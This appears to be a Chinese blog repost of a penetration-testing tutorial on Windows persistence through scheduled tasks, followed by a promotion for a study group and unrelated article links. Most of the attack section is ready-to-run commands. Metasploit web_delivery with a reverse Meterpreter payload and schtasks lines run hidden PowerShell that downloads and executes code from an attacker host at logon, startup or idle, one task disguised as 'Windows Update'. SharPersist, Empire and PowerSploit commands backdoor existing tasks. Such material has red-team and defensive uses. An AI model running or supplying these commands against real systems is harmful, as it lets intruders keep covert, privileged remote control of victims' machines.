通过计划任务实现持续性攻击

2023-12-12 23:33

本文主要是介绍通过计划任务实现持续性攻击,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Windows操作系统中提供了一个实用工具schtasks.exe,系统管理可以使用该工具完成在指定日期和时间执行程序或脚本的工作。但是目前这个工具经常被黑客或者红队利用,从而实现持续性攻击。普通情况下,通过计划任务实现持续性攻击不需要用到管理员的权限,但是如果你希望能获得更加灵活的操作,例如指定用户登录时或者系统空闲时执行某个任务,还是会需要用到管理员的权限。

通过计划任务完成的持续性攻击既可以手动实现,也可以自动实现。Payload既可以从磁盘上执行,也可以从远程位置下载执行,这些Payload可以是可执行文件、PowerShell脚本或者scriptlets形式。

这种方法已经由来已久,但是却仍然被黑客或者红队所广泛使用,而且现在已经有很多开源工具中也都使用了这个方法。

Metasploit中的“web_delivery”模块可用于管理和生成各种格式的Payload。

use exploit/multi/script/web_delivery
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.0.2.21
set target 5
exploit

在命令提示行中使用“schtasks”命令可以创建一个计划任务。

例如使用下面的命令就可以指定在每次系统登录时,操作系统会自动去下载并执行一个基于PowerShell的Payload。

schtasks /create /tn PentestLab /tr 
"c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle 
hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object 
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"
/sc onlogon /ru Syste

图*-* 命令提示符中实现的计划任务

当系统用户再次登录时,系统将下载执行Payload并建立Meterpreter会话。

图*-* 通过计划任务建立的Meterperter

也可以指定Payload在系统启动期间或系统空闲时执行。

#(X64) - On System Start
schtasks /create /tn PentestLab /tr 
"c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle 
hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object 
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"
/sc onstart /ru System#(X64) - On User Idle (30mins)
schtasks /create /tn PentestLab /tr 
"c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle 
hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object 
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" 
/sc onidle /i 30 #(X86) - On User Login
schtasks /create /tn PentestLab /tr 
"c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe 
-WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX 
((new-object 
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"
/sc onlogon /ru System#(X86) - On System Start
schtasks /create /tn PentestLab /tr 
"c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe 
-WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX 
((new-object 
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" 
/sc onstart /ru System#(X86) - On User Idle (30mins)
schtasks /create /tn PentestLab /tr 
"c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe 
-WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX 
((new-object 
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" 
/sc onidle /i 30

另外我们也可以指定Payload在特定的日期和时间来执行,而且也可以实现Payload的自动删除。

schtasks /CREATE /TN "Windows Update" /TR 
"c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle 
hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object 
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"/SC 
minute /MO 1 /ED 04/11/2019 /ET 06:53 /Z /IT /RU %USERNAME%

图*-* 指定日期和时间开展的持续性攻击

如果一个事件(event)开启了事件日志(event logging),那么就可以通过这个事件来触发一个任务(task),b33f在他的网站上展示了这种技术。在Windows中的事件(event)命令行可以查询事件(event)的ID。

我们可以创建一个关联特定事件的计划任务(下载执行某个payload)。

图*-* 持续性攻击-计划任务事件ID

“Query”参数可用于检索新创建的计划任务的信息:schtasks /Query /tn OnLogOff /fo List /v

图*-*  查询调度任务

当目标系统的用户管理员注销时,将创建事件ID,并在下次登录时执行payload。

图*-*  用户管理员注销获取的Meterpreter

我们也可以使用PowerShell创建计划任务,这些任务将在用户登录时或在特定的时间和日期执行。

$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\temp\pentestlab.exe"
$T = New-ScheduledTaskTrigger -AtLogOn -User "pentestlab"
$S = New-ScheduledTaskSettingsSet
$P = New-ScheduledTaskPrincipal "Pentestlab"
$D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
Register-ScheduledTask Pentestlab -InputObjec $D$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\temp\pentestlab.exe"
$T = New-ScheduledTaskTrigger -Daily -At 9am
$P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
$S = New-ScheduledTaskSettingsSet
$D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
Register-ScheduledTask PentestLaboratories -InputObject $D

图*-* 持续性攻击-PowerShell

SharPersist

https://github.com/fireeye/SharPersist

Brett Hawkins通过计划任务在工具SharPersist中实现多种持续性攻击的方法。如果用户具有管理员级别的权限,就可以使用以下命令来创建一个新的计划任务,该任务将会在系统登录时执行。

SharPersist.exe -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c 
C:\tmp\pentestlab.exe" -n "PentestLab" -m add -o logon

图*-* SharPersist–新计划任务(登录时触发)

在下一次登录系统时,将执行payload并打开MeterMeter会话。

SharPersist -t schtask -m list -n "PentestLab"

图*-* 使用SharPersist列出的任务信息

或者只使用“list”选项而不指定名称将枚举系统上所有现有的计划任务。

SharPersist -t schtask -m list

图*-* 使用SharPersist列出的计划任务信息

与Metasploit框架功能类似,SharPersist中也具有检查目标是否易受攻击的功能,SharPersist提供了一个运行检查,这个功能可用于通过检查名称和提供的参数来验证计划任务。

SharPersist.exe -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c 
C:\tmp\pentestlab.exe" -n "PentestLab" -m check

图*-* 使用SharPersist检查任务信息能否执行

SharPersist还可以枚举登录期间将执行的所有计划任务。此命令可在主机的环境调查(situational awareness)期间使用,并确定是否可以修改现有任务而不是新建任务来执行Payload。

SharPersist -t schtaskbackdoor -m list -o logon

图*-* 使用SharPersist列出的登录时计划任务列表

schtaskbackdoor功能和check结合使用,可以识别特定的调度任务是否已存在后门。

SharPersist.exe -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c 
C:\tmp\pentestlab.exe" -n "PentestLab" -m check

图*-* 使用SharPersist列出的Backdoor 计划任务列表

“Add”参数用来隐藏一个现有的计划任务,该任务将执行恶意命令,而不是执行合法的操作。

SharPersist.exe -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c 
C:\tmp\pentestlab.exe" -n "ReconcileLanguageResources" -m add

图*-* 使用SharPersist列出的Backdoor 计划任务列表

Empire

Empire中包含两个可以用来实现计划任务的模块(区别在于使用时权限不同),下面给出的命令可以通过PowerShell的userland模块在每天的3:22am执行一个payload。这个payload在注册表中的的任务名称为“WindowsUpdate”,这里要和正常的任务区分开。

usemodule persistence/userland/schtasks
set Listener http
set TaskName WindowsUpdate
set DailyTime 03:22
execute

图*-* 使用Empire列出的Backdoor 计划任务列表

PowerShell的elevated模块提供了一个用户登录时执行计划任务的选项。注册表中将这两个模块以Base64编码的格式存储在不同的表项中。

usemodule persistence/elevated/schtasks*
set Listener http

图*-* elevated模块

PowerSploit

PowerSploit的持续性攻击模块支持一些可以向脚本或脚本块添加持续性攻击的功能。在使用这个模块时,需要配置Elevated和user选项。

$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -Hourly
$UserOptions = New-UserPersistenceOption -ScheduledTask -Hourly
Add-Persistence -FilePath C:\temp\empire.exe -ElevatedPersistenceOption 
$ElevatedOptions -UserPersistenceOption $UserOptions

图*-* PowerSploit – 计划任务列表

from:https://pentestlab.blog/tag/powersploit

想看更多国际顶级技术文章的读者可以加入我们"Kali Linux2020 渗透测试指南"知识星球,我们会提供超过20篇最新国外的技术文章的原创翻译文章和视频讲解!

当前很多培训机构和安全公众号在技术上炒冷饭,我们希望能够和大家分享国内外研究热点的论文和最新技术文章,主要是外文文献为准,目的是帮助大家更深层次的去了解到当前世界上安全领域最新的研究方向,以及国内外这些网络安全专家他们研究问题的思路和方法!

 

星球主讲人:

李华峰,信息安全顾问和自由撰稿人,多年来一直从事网络安全渗透测试方面的研究工作。在网络安全部署、网络攻击与防御以及社会工程学等方面有十分丰富的实践经验。已出版的著作和译著包括:《精通Metasploit渗透测试(第2版)》《诸神之眼—Nmap网络安全审计技术揭秘》《Python渗透测试编程-技术方法与实践2》《Wireshark网络分析从入门到实践》《Kali Linux 2网络渗透测试实践指南 2》等。

 

扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

目前30000+人已关注加入我们

目前30000+人已关注加入我们

这篇关于通过计划任务实现持续性攻击的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/486325

相关文章

hdu1043(八数码问题,广搜 + hash(实现状态压缩) )

利用康拓展开将一个排列映射成一个自然数,然后就变成了普通的广搜题。 #include<iostream>#include<algorithm>#include<string>#include<stack>#include<queue>#include<map>#include<stdio.h>#include<stdlib.h>#include<ctype.h>#inclu

【C++】_list常用方法解析及模拟实现

相信自己的力量,只要对自己始终保持信心,尽自己最大努力去完成任何事,就算事情最终结果是失败了,努力了也不留遗憾。💓💓💓 目录   ✨说在前面 🍋知识点一:什么是list? •🌰1.list的定义 •🌰2.list的基本特性 •🌰3.常用接口介绍 🍋知识点二:list常用接口 •🌰1.默认成员函数 🔥构造函数(⭐) 🔥析构函数 •🌰2.list对象

【Prometheus】PromQL向量匹配实现不同标签的向量数据进行运算

✨✨ 欢迎大家来到景天科技苑✨✨ 🎈🎈 养成好习惯,先赞后看哦~🎈🎈 🏆 作者简介:景天科技苑 🏆《头衔》:大厂架构师,华为云开发者社区专家博主,阿里云开发者社区专家博主,CSDN全栈领域优质创作者,掘金优秀博主,51CTO博客专家等。 🏆《博客》:Python全栈,前后端开发,小程序开发,人工智能,js逆向,App逆向,网络系统安全,数据分析,Django,fastapi

让树莓派智能语音助手实现定时提醒功能

最初的时候是想直接在rasa 的chatbot上实现,因为rasa本身是带有remindschedule模块的。不过经过一番折腾后,忽然发现,chatbot上实现的定时,语音助手不一定会有响应。因为,我目前语音助手的代码设置了长时间无应答会结束对话,这样一来,chatbot定时提醒的触发就不会被语音助手获悉。那怎么让语音助手也具有定时提醒功能呢? 我最后选择的方法是用threading.Time

Android实现任意版本设置默认的锁屏壁纸和桌面壁纸(两张壁纸可不一致)

客户有些需求需要设置默认壁纸和锁屏壁纸  在默认情况下 这两个壁纸是相同的  如果需要默认的锁屏壁纸和桌面壁纸不一样 需要额外修改 Android13实现 替换默认桌面壁纸: 将图片文件替换frameworks/base/core/res/res/drawable-nodpi/default_wallpaper.*  (注意不能是bmp格式) 替换默认锁屏壁纸: 将图片资源放入vendo

C#实战|大乐透选号器[6]:实现实时显示已选择的红蓝球数量

哈喽,你好啊,我是雷工。 关于大乐透选号器在前面已经记录了5篇笔记,这是第6篇; 接下来实现实时显示当前选中红球数量,蓝球数量; 以下为练习笔记。 01 效果演示 当选择和取消选择红球或蓝球时,在对应的位置显示实时已选择的红球、蓝球的数量; 02 标签名称 分别设置Label标签名称为:lblRedCount、lblBlueCount

Kubernetes PodSecurityPolicy:PSP能实现的5种主要安全策略

Kubernetes PodSecurityPolicy:PSP能实现的5种主要安全策略 1. 特权模式限制2. 宿主机资源隔离3. 用户和组管理4. 权限提升控制5. SELinux配置 💖The Begin💖点点关注,收藏不迷路💖 Kubernetes的PodSecurityPolicy(PSP)是一个关键的安全特性,它在Pod创建之前实施安全策略,确保P

工厂ERP管理系统实现源码(JAVA)

工厂进销存管理系统是一个集采购管理、仓库管理、生产管理和销售管理于一体的综合解决方案。该系统旨在帮助企业优化流程、提高效率、降低成本,并实时掌握各环节的运营状况。 在采购管理方面,系统能够处理采购订单、供应商管理和采购入库等流程,确保采购过程的透明和高效。仓库管理方面,实现库存的精准管理,包括入库、出库、盘点等操作,确保库存数据的准确性和实时性。 生产管理模块则涵盖了生产计划制定、物料需求计划、

C++——stack、queue的实现及deque的介绍

目录 1.stack与queue的实现 1.1stack的实现  1.2 queue的实现 2.重温vector、list、stack、queue的介绍 2.1 STL标准库中stack和queue的底层结构  3.deque的简单介绍 3.1为什么选择deque作为stack和queue的底层默认容器  3.2 STL中对stack与queue的模拟实现 ①stack模拟实现

基于51单片机的自动转向修复系统的设计与实现

文章目录 前言资料获取设计介绍功能介绍设计清单具体实现截图参考文献设计获取 前言 💗博主介绍:✌全网粉丝10W+,CSDN特邀作者、博客专家、CSDN新星计划导师,一名热衷于单片机技术探索与分享的博主、专注于 精通51/STM32/MSP430/AVR等单片机设计 主要对象是咱们电子相关专业的大学生,希望您们都共创辉煌!✌💗 👇🏻 精彩专栏 推荐订阅👇🏻 单片机